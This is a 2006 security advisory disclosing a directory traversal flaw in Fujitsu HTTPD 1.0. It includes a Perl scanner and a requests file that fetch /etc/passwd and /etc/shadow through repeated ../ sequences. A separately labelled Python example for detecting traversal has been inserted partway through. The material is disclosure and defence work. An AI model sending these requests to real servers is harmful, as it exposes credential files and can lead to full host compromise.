Tried, Tested and Proven

Security Advisory 06 – 010 – Directory Traversal Vulnerability

Vulnerable System:

Fujitsu/HTTPD ver1.0

Vulnerability discovery and development:

Paul Docherty

Affected Systems:

Fujitsu HTTPD Server Version 1.0

Details:

The Fujitsu web server is part of a system management suite of products which is designed to allow network based management of the host the server resides on. By sending a specially crafted HTTP request to the server it is possible to retrieve the source code of CGI scripts on the vulnerable server.

The request that triggers this issue consists of a sequence of “change directory” (..) components that is not terminated with a final slash (/). For example, by default the system loads the CGI script top.cgi, which in turn loads other Java-based code; to view the source code of the top.cgi script, make a request for /../.. Additionally, only HTTP/1.1 requests with a qualified Host: header trigger the issue.

The request that triggers the file-read issue consists of a named directory followed by 15 (this has proved the most reliable number) ../ sequences. Again, only HTTP/1.1 requests with a qualified Host: header trigger the issue.

Portcullis have verified the following two directory names as triggers for the issue:

/Admin/../../../../../../../../../../../../../../../etc/passwd

/Guest/../../../../../../../../../../../../../../../etc/passwd
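To show why requests of this shape escape the document root, and what a server-side check that rejects them looks like, here is an added Python example (not part of this advisory and not Fujitsu's code); the document root path is assumed and the sample request lines are constructed after the advisory's requests file.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for illustration; the advisory does not state Fujitsu's.
DOCROOT = "/opt/fujitsu/httpd/htdocs"

def naive_resolve(request_path):
    """What a server does when it simply appends the URL path to its document
    root: the '..' segments are collapsed by the filesystem and the request
    escapes DOCROOT entirely."""
    return posixpath.normpath(DOCROOT + request_path)

def safe_resolve(request_path):
    """Return the file inside DOCROOT that request_path refers to, or None if
    the path tries to climb above the document root.  Percent-decoding is done
    first so '%2e%2e' is treated the same as '..'."""
    segments = []
    for segment in unquote(request_path).split("/"):
        if segment in ("", "."):
            continue                      # empty (from '//' or a trailing '/') or '.'
        if segment == "..":
            if not segments:
                return None               # would leave the document root: reject
            segments.pop()
        else:
            segments.append(segment)
    return posixpath.join(DOCROOT, *segments) if segments else DOCROOT

def is_traversal_request(request_line):
    """True when a request line such as 'GET /Admin/../.. HTTP/1.1' (the form
    used in the advisory's requests file) would be rejected by safe_resolve."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    return safe_resolve(parts[1]) is None

if __name__ == "__main__":
    # Constructed sample request lines modelled on the advisory's requests file.
    samples = [
        "GET /Admin/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1",
        "GET /../.. HTTP/1.1",
        "GET /Guest/index.html HTTP/1.1",
    ]
    for line in samples:
        print(f"{'TRAVERSAL' if is_traversal_request(line) else 'ok':9} {line}")
```

The same lexical walk can be run over web server access logs to flag attempts after the fact, since it needs only the request path.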

Impact:

An attacker can request and view any file on the system that the web server process user has privileges to read. In the default configuration, where the web server runs as root, any file can be read. This can lead to a complete compromise of the host.

Exploit:

Portcullis have developed a utility to identify this vulnerability. See below.

--------------------------------------- PERL CODE CUT HERE -----------------------------------

#!/usr/bin/perl -w
# This Script was created to verify the existence of the issues highlighted by
# Portcullis Advisories 06-010 and 06-011. As the Fujitsu/HTTPD Ver1.0 Server
# typically runs on a port other than 80 you need to specify the
# port on the command line.
#
# USAGE fujihttp.pl -h the FQHN or IP -p port -r file of requests
#
# Paul Docherty - pjd@portcullis-security.com
#
use strict;
use IO::Socket;
use Getopt::Std;

our ($opt_h, $opt_p, $opt_r);
getopt('hpr');    # -h, -p and -r each take an argument

if ((! $opt_h) || (! $opt_p) || (! $opt_r)) {
    print "\nUSAGE: fujihttp.pl -h [IP] -p [port] -r [request file]\n";
    print "\nExample: perl ./fujihttp.pl -h 10.20.30.40 -p 80 -r requests\n\n";
    exit 1;
}

my $host    = $opt_h;
my $port    = $opt_p;
my $request = $opt_r;
my $string  = "HTTP/1.0 200 OK"; # Obviously you can change this to suit your needs!!

open (LIST, "<", $request) or die "Unable to open $request ....\n\n $!";
&connect;
close (LIST);
exit 0;

# Send each request line from the file on its own connection and report any
# response whose status line matches $string.
sub connect {
    foreach my $request (<LIST>) {
        chomp $request;
        my $connection = IO::Socket::INET->new (
            Proto    => "tcp",
            PeerAddr => "$host",
            PeerPort => "$port",
        ) or die "Can't CONNECT to $host on the Port specified.\n $!";
        $connection->autoflush;
        # HTTP/1.1 requests need a Host: header; the empty line ends the request.
        print $connection "$request\r\nHost: localhost\r\n\r\n";
        my $results = join '', <$connection>;   # read the whole response
        if ( $results =~ /($string)/ ) {
            print "$host\n";
            print "$1 This Server appears Vulnerable:\n";
        }
        close ($connection);
        #sleep 3;
    }
}

--------------------------------------- PERL CODE ENDS CUT HERE -----------------------------

This is the requests file referenced above.

--------------------------------------- REQUESTS.TXT CUT HERE -------------------------------

GET /Guide/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1

GET /Guide/../../../../../../../../../../../../../../../etc/shadow HTTP/1.1

GET /Admin/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1

GET /Admin/../../../../../../../../../../../../../../../etc/shadow HTTP/1.1

GET /../.. HTTP/1.1

GET /KNOWN-APP-DIR/../.. HTTP/1.1

--------------------------------------- REQUESTS.TXT ENDS CUT HERE ---------------------------

Impact:

An attacker can request and view the source code of CGI scripts on the vulnerable server.

Vendor Status:

Notified via email 2 November 2005

Notified (2) via email 17 February 2006

Notified (3) via email 17 April 2006

Notified (4) via email 30 June 2006

Copyright:

Copyright © Portcullis Computer Security Limited 2006, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information.
It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.